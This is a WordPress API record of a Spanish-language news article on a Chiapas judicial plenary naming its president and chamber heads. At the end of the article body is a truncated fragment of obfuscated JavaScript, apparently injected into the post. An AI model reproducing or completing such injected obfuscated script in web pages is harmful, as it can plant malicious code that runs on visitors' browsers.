{"id":13925,"date":"2024-02-01T04:25:09","date_gmt":"2024-02-01T04:25:09","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=13925"},"modified":"2024-02-01T04:25:09","modified_gmt":"2024-02-01T04:25:09","slug":"sesionan-y-nombran-presidenta-del-pleno-de-distrito-del-poder-judicial","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=13925","title":{"rendered":"Sesionan y nombran presidenta del Pleno de Distrito del Poder Judicial"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"542\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1706761046002.jpg\" alt=\"\" class=\"wp-image-13926\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1706761046002.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1706761046002-300x226.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>31 de enero del 2024. Tuxtla Guti\u00e9rrez, Chiapas.- En sesi\u00f3n extraordinaria del Pleno de Distrito se tom\u00f3 protesta como integrante de este \u00d3rgano Colegiado, al magistrado Ernesto Hern\u00e1ndez Ruiz, quien funge como Titular de la Ponencia \u201cA\u201d de la Primera Sala Regional Colegiada en Materia Penal, Zona 01, Tuxtla.<\/p>\n\n\n\n<p>De la misma manera, por unanimidad de votos se nombr\u00f3 a la magistrada Mar\u00eda Elena Faviel Barrios como presidenta del Pleno de Distrito.<\/p>\n\n\n\n<p>Cumpliendo de esta manera con los Art\u00edculos 128 de la Constituci\u00f3n Pol\u00edtica de los Estados Unidos Mexicanos; 117, p\u00e1rrafo tercero, de la Constituci\u00f3n Pol\u00edtica del Estado de Chiapas; y primer p\u00e1rrafo, parte final, del numeral 37 del C\u00f3digo de Organizaci\u00f3n del Poder Judicial del Estado de Chiapas.<\/p>\n\n\n\n<p>Es de mencionar que, en virtud de la rotaci\u00f3n de magistradas y magistrados dentro del Poder Judicial del Estado de Chiapas, se origin\u00f3 la integraci\u00f3n de las Salas Civiles, Penales y la Especializada en Justicia para Adolescentes.<\/p>\n\n\n\n<p>En \u00e9stas se nombr\u00f3 como presidentas de la Segunda Sala Civil, Mar\u00eda Elena Faviel Barrios; Primera Sala Civil Claudia Lucia Dom\u00ednguez Acu\u00f1a; Primera Sala Penal, Ernesto Hern\u00e1ndez Ruiz; Segunda Sala Penal, Isela de Jes\u00fas Martinez Flores, y de la Sala Unitaria Especializada en Justicia para Adolescentes, Luis Raquel Cal y Mayor Franco. En consecuencia, dichos magistrados y magistradas integran ahora el Pleno de Distrito.<\/p>\n\n\n\n<p>Posteriormente, las y los integrantes del Pleno sostuvieron una reuni\u00f3n con el magistrado presidente, quien les invit\u00f3 a seguir trabajando en aras de la impartici\u00f3n de justicia en Chiapas, convoc\u00e1ndoles a conducirse con \u00e9tica, honestidad y convicci\u00f3n, reforzando desde sus espacios las buenas pr\u00e1cticas, los valores y principios de esta casa de la justicia.<\/p>\n\n\n\n<p>Estas acciones evidencian el compromiso del Poder Judicial para continuar trabajando desde la respetuosa independencia de Poderes, en la construcci\u00f3n conjunta de un Chiapas con justicia y desarrollo en beneficio de las y los justiciables.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 31 de enero del 2024. Tuxtla Guti\u00e9rrez, Chiapas.- En sesi\u00f3n extraordinaria del Pleno de Distrito se tom\u00f3 protesta como integrante de este \u00d3rgano Colegiado, al magistrado Ernesto Hern\u00e1ndez Ruiz, quien funge como Titular de la Ponencia \u201cA\u201d de la Primera Sala Regional Colegiada en Materia Penal, Zona 01, Tuxtla. De la misma manera, por &hellip;<\/p>\n","protected":false},"author":2,"featured_media":13926,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-13925","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13925","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13925"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13925\/revisions"}],"predecessor-version":[{"id":13927,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13925\/revisions\/13927"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/13926"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13925"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13925"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13925"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}